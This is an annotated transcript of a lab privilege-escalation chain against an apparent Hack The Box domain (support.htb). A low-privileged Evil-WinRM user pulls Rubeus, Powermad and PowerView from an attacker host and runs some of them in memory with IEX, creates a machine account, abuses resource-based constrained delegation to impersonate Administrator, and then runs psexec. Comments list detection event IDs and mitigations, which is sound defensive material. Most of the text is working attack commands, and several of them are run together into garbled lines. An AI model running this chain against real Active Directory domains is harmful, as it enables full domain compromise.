Priv Esc
Outbound object rights

GenericAll

















# Transcript of a resource-based constrained delegation (RBCD) privilege-escalation chain,
# captured in an Evil-WinRM session running as the low-privileged user "support".
# Several lines below are collapsed runs of multiple statements (extraction artifact);
# the individual steps are described in the comments rather than re-split.
#
# Step 1 - tooling (Rubeus, Powermad, PowerView) is staged from an attacker-controlled web
# host (10.10.14.3) into C:\programdata and loaded in memory with IEX.
# Detection: PowerShell Script Block Logging (Event ID 4104) records the IEX'd script content;
# Net.WebClient / curl downloads from a user's WinRM session and new executables written under
# C:\ProgramData are both worth alerting on.
*Evil-WinRM* PS C:\Users\support\Documents> cd C:\programdata
*Evil-WinRM* PS C:\programdata> curl 10.10.14.3/Rubeus.exe -o Rubeus.exe
*Evil-WinRM* PS C:\programdata> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.3/Powermad.ps1')
# Step 2 (collapsed line) - loads PowerView, reads ms-DS-MachineAccountQuota on DC=SUPPORT,DC=HTB,
# creates a new computer account (Adot8Machine) with Powermad, resolves its objectSid and builds
# a security descriptor granting that SID full control.
# Risk: the default quota of 10 lets any authenticated domain user add computer accounts.
# Mitigation: set ms-DS-MachineAccountQuota to 0; alert on Event ID 4741 (computer account
# created) where the creating principal is not a known provisioning/admin account.
*Evil-WinRM* PS C:\programdata> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.3/PowerView.ps1')Get-DomainObject -Identity 'DC=SUPPORT,DC=HTB' | select ms-ds-machineaccountquota New-MachineAccount -MachineAccount Adot8Machine -Password $(ConvertTo-SecureString 'adot8' -AsPlainText -Force)$ComputerSid = Get-DomainComputer Adot8Machine -Properties objectsid | Select -Expand objectsid$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
# The binary form of the descriptor is what gets written into the directory attribute below.
$SDBytes = New-Object byte[] ($SD.BinaryLength)
# Step 3 (collapsed line) - serialises the descriptor and writes it to
# msDS-AllowedToActOnBehalfOfOtherIdentity on the Adot8Machine object, derives the new
# account's RC4 key from its password with Rubeus, requests an S4U ticket for
# cifs/dc.support.htb impersonating Administrator, converts the .kirbi to a ccache with
# ticketConverter.py and uses it with impacket-psexec (Kerberos auth, no password).
# Detection: Event ID 5136 / 4742 on any change to msDS-AllowedToActOnBehalfOfOtherIdentity;
# Event ID 4769 service-ticket requests where the requesting account is a freshly created
# machine account and the ticket is for a privileged user; Event ID 7045 (service installed)
# on the target host for the psexec stage.
# Mitigation: add privileged accounts to Protected Users or mark them "Account is sensitive and
# cannot be delegated" so S4U impersonation of them fails; restrict write access to the RBCD
# attribute on servers and domain controllers.
# NOTE(review): "[email protected]" at the end looks like an email-obfuscation artifact from page
# extraction rather than the original target string - TODO confirm against the source write-up.
$SD.GetBinaryForm($SDBytes, 0)Get-DomainComputer Adot8Machine | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}.\Rubeus.exe hash /password:adot8.\Rubeus.exe s4u /user:Adot8Machine$ /rc4:872E7BD85E304E2AF28DFE1BDAF25D8B /impersonateuser:Administrator /msdsspn:cifs/dc.support.htb /pttbase64 -d ticket.kirbi.b64 > ticket.kirbiticketConverter.py ticket.kirbi ticket.ccacheexport KRB5CCNAME=ticket.ccacheimpacket-psexec -k -no-pass support.htb/[email protected]